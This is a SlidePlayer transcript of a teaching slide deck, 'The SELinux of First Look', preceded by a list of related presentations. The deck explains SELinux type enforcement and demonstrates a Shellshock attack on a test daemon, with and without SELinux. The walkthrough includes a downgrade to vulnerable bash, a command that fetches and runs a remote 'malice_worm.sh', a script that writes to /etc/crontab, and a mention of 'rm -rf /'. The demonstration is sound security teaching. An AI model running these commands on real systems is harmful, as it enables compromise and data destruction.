The SELinux of First Look. Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather.

Slides:



Advertisements
Similar presentations
JENNIS SHRESTHA CSC 345 April 22, Contents Introduction History Flux Advanced Security Kernel Mandatory Access Control Policies MAC Vs DAC Features.
Advertisements

MCDST : Supporting Users and Troubleshooting a Microsoft Windows XP Operating System Chapter 7: Troubleshoot Security Settings and Local Security.
1 Defining System Security Policies. 2 Module - Defining System Security Policies ♦ Overview An important aspect of Network management is to protect your.
Title of Selected Paper: Design and Implementation of Secure Embedded Systems Based on Trustzone Authors: Yan-ling Xu, Wei Pan, Xin-guo Zhang Presented.
By: Arpit Pandey SELINUX (SECURITY-ENHANCED LINUX)
70-293: MCSE Guide to Planning a Microsoft Windows Server 2003 Network, Enhanced Chapter 13: Planning Server and Network Security.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 9: Implementing and Using Group Policy.
1 Flexible Mandatory Access Control (MAC) in Modern Operating Systems Jeffrey H. Jewell CS 591 December 7, 2009 Jeffrey H. Jewell CS 591 December 7, 2009.
Chapter 9 Building a Secure Operating System for Linux.
SELinux (Security Enhanced Linux) By: Corey McClurg.
Security-Enhanced Linux Joseph A LaConte CS 522 December 8, 2004.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment Chapter 9: Implementing and Using Group Policy.
Shane Jahnke CS591 December 7,  What is SELinux?  Changing SELinux Policies  What is SLIDE?  Reference Policy  SLIDE  Installation and Configuration.
7-Access Control Fundamentals Dr. John P. Abraham Professor UTPA.
ADVANCED LINUX SECURITY. Abstract : Using mandatory access control greatly increases the security of an operating system. SELinux, which is an implementation.
Security-Enhanced Linux & Linux Security Module The George Washington University CS297 Programming Language & Security YU-HAO HU.
Principles of Computer Security: CompTIA Security + ® and Beyond, Second Edition © 2010 Baselines Chapter 14.
Chapter 4: Security Baselines Security+ Guide to Network Security Fundamentals Second Edition.
70-290: MCSE Guide to Managing a Microsoft Windows Server 2003 Environment, Enhanced Chapter 9: Implementing and Using Group Policy.
Computer Security & OS Lab. DKU May 26 Younsik Jeong Ph.D. Student.
All Your Droid Are Belong To Us: A Survey of Current Android Attacks 단국대학교 컴퓨터 보안 및 OS 연구실 김낙영
Chapter 3 Controlling Files. Chapter 3 Overview The file system and file access rights Executable files Computer viruses and malware Policies for file.
1 Guide to Novell NetWare 6.0 Network Administration Chapter 12.
SELinux US/Fedora/13/html/Security-Enhanced_Linux/
Controlling Files Richard Newman based on Smith “Elementary Information Security”
Linux kernel security Professor: Mahmood Ranjbar Authors: mohammad Heydari Mahmood ZafarArjmand Zohre Alihoseyni Maryam Sabaghi.
Information Assurance Research Group 1 NSA Security-Enhanced Linux (SELinux) Grant M. Wagner Information Assurance.
OS Hardening Justin Whitehead Francisco Robles. ECE Internetwork Security OS Hardening Installing kernel/software patches and configuring a system.
FOSS Security through SELinux (Security Enhanced Linux) M.B.G. Suranga De Silva Information Security Specialist TECHCERT c/o Department of Computer Science.
1 Implementation of Security-Enhanced Linux Yue Cui Xiang Sha Li Song CMSC 691X Project 2—Summer 02.
Linux Security LINUX SECURITY. Firewall Linux Security Internet Database Application Web Server Firewall.
CIS 290 Linux Security Program Authentication Module and Security Enhanced LINUX.
Module 7: Managing the User Environment by Using Group Policy.
ADV. NETWORK SECURITY CODY WATSON What’s in Your Dongle and Bank Account? Mandatory and Discretionary Protections of External Resources.
Guide To UNIX Using Linux Third Edition Chapter 8: Exploring the UNIX/Linux Utilities.
Android Security Model that Provide a Base Operating System Presented: Hayder Abdulhameed.
Silberschatz, Galvin and Gagne ©2009 Operating System Concepts – 8 th Edition, Protection (Chapter 14)
Linux Security. Authors:- Advanced Linux Programming by Mark Mitchell, Jeffrey Oldham, and Alex Samuel, of CodeSourcery LLC published by New Riders Publishing.
SELinux. The need for secure OS Increasing risk to valuable information Dependence on OS protection mechanisms Inadequacy of mainstream operating systems.
Principles of Computer Security: CompTIA Security + ® and Beyond, Third Edition © 2012 Principles of Computer Security: CompTIA Security+ ® and Beyond,
Unix – Linux CS3353 Ssystem Administration. OS The Operating System – Acts as the interface to all software, hardware, and users of a computer. – Requires.
Module 7: Implementing Security Using Group Policy.
© Wiley Inc All Rights Reserved. MCSE: Windows Server 2003 Active Directory Planning, Implementation, and Maintenance Study Guide, Second Edition.
COEN 350: Network Security Authorization. Fundamental Mechanisms: Access Matrix Subjects Objects (Subjects can be objects, too.) Access Rights Example:
Trusted Operating Systems
Access Control: Policies and Mechanisms Vinod Ganapathy.
Security-Enhanced Linux Eric Harney CPSC 481. What is SELinux? ● Developed by NSA – Released in 2000 ● Adds additional security capabilities to Linux.
Computer Security: Principles and Practice
Wireless Security Presented by Colby Carlisle. Wireless Networking Defined A type of local-area network that uses high-frequency radio waves rather than.
5/7/2007CoreMcClug/SELinux 1 By: Corey McClurg. Outline A History of SELinux What is SELinux and how do I get it? Getting Started Mandatory Access Control.
Module 8 Implementing Security Using Group Policy.
LINUX Presented By Parvathy Subramanian. April 23, 2008LINUX, By Parvathy Subramanian2 Agenda ► Introduction ► Standard design for security systems ►
Security-Enhanced Linux Stephanie Stelling Center for Information Security Department of Computer Science University of Tulsa, Tulsa, OK
Access Controls Mandatory Access Control by Sean Dalton December 5 th 2008.
1 Improving GNU/Linux Security : MAC solution BSU CS Colloquium – Spring 2006 Fabien POULARD, ISEP Student.
MLS/MCS on SE Linux Russell Coker. What is SE Linux? A system for Mandatory Access Control (MAC) based on the Linux Security Modules (LSM) framework Uses.
Linux Kernel Security (SELinux vs AppArmor vs Grsecurity)
Overview of NSA Security Enhanced Linux Russell Coker.
SELinux Overview Dan Walsh SELinux for Dummies Dan Walsh
SE Linux Implementation Russell Coker. What is SE Linux? A system for Mandatory Access Control (MAC) based on the Linux Security Modules (LSM) framework.
Protection and Security
Secure Software Confidentiality Integrity Data Security Authentication
Chapter 4: Security Baselines
SE Linux Implementation
IS3440 Linux Security Unit 6 Using Layered Security for Access Control
SELinux (Security Enhanced Linux)
An Overview Rick Anderson Pat Demko
SELinux
Convergence IT Services Pvt. Ltd
Presentation transcript:

The SELinux of First Look

Prologue After many discussions with a lot of Linux users, I’ve come to realize that most of them seem to disable SELinux rather than understand why it’s always denying access and its worth.

Content Introduce SELinux Talk about some vulnerabilities around us Attack tests with or without SELinux Summary

SELinux Security-Enhanced Linux (SELinux) is a mandatory access control (MAC) security mechanism implemented in the kernel.

SELinux Policy The SELinux Policy is the set of rules that guide the SELinux security engine. It defines types for file objects and domains for processes. It uses roles to limit the domains that can be entered, and has user identities to specify the roles that can be attained. In essence, types and domains are equivalent, the difference being that types apply to objects while domains apply to processes.

Access Control Model Type Enforcement (TE): –Type Enforcement is the primary mechanism of access control used in the targeted policy Role-Based Access Control (RBAC): –Based around SELinux users (not necessarily the same as the Linux user), but not used in the default targeted policy Multi-Level Security (MLS): –Not commonly used and need install specific mls policy.

What Can SELinux do? SELinux does not block the exploit but it would prevent escalation of confined domains:SELinux can contain the exploits and reduce their influence.

Cyber Vulnerabilities In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance. Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw[1]. [1]"The Three Tenets of Cyber Security". U.S. Air Force Software Protection Initiative. Retrieved

Major Events HeartBleed(CVE ) Shellshock(CVE ) …

Attack Step 1 1.Make sure Shellshock is not patched. –If your bash’s version is higher than (1), you need downgrade it to (1) or lower versions.

Open Loophole –Not necessary Wget el7.x86_64.rpmhttp://test.njucs-os.tk/selinuxtest/bash el7.x86_64.rpm Yum downgrade bash el7.x86_64.rpm –Wget os.tk/selinuxtest/region_date_daemonhttp://test.njucs- os.tk/selinuxtest/region_date_daemon –Wget –Run start.sh

Attack Step 2 Test Shellsock

Attack Step 3 3. Run it to display current date based on TCP. It will display the current date and time in the given format by inputing local-info. Example:

Attack Step 4 4.Change the files contexts –If selinux is enabled, the behavior of date_daemon will be restricted in its domain by the context.

Attack Step 5 5.Prepare “malicious” script Injector. 1.#!/bin/bash 2. 3.now=$(date) 4.echo "$now: Your OS is pwned!" 5.echo "$now: Your OS is pwned!" >> /tmp/pwn.log 6.echo "# $now: Your OS is pwned!" >> /etc/crontab It is a very friendly malicious script! :P

Attack Tests In the test, we write a daemon running in the CentOS with SElinux in enforcing-mode or permissive-mode, let's run a designed Shellsock attack on it. The set of commands made up for this test Injector.sh: –rm malice_worm.sh ; –wget --no-verbose --output-document=malice_worm.sh os.tk/selinuxtest/malice_worm.sh; –rm injector.sh ; –bash malice_worm.sh

Attack Step 6 6.Attack OS with SELinux

Attack Step 7 7.Attack OS without SELinux

What-If… What would be happen If the script “rm –rf /” was put in the Injector.

Awesome SElinux protects your OS even if you have software security failing. How does selinux accomplish this protection task? –Utilize control points of objects in the system.

Control Point The following types are used with DHCP: dhcp_etc_t –This type is mainly used for files in the /etc/ directory, including configuration files. dhcpd_var_run_t –This type is used for the PID file for dhcpd, in the /var/run/ directory. dhcpd_exec_t –This type is used for transition of DHCP executable files to the dhcpd_t domain. dhcpd_initrc_exec_t –This type is used for transition of DHCP executable files to the dhcpd_initrc_t domain.

But the type of crontab is system_cron_spool_t, the process running as dhcpd_exec_t is not allowed to write to /etc/crontab.

Graphic Interpretation Without SELinuxWith SELinux

Conclusion SELinux does not block the exploit but it would prevent escallation of confined domains. Base SELinux we can build more enhanced security protection mechanism.

Thank you!

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2024 SlidePlayer.com Inc. All rights reserved.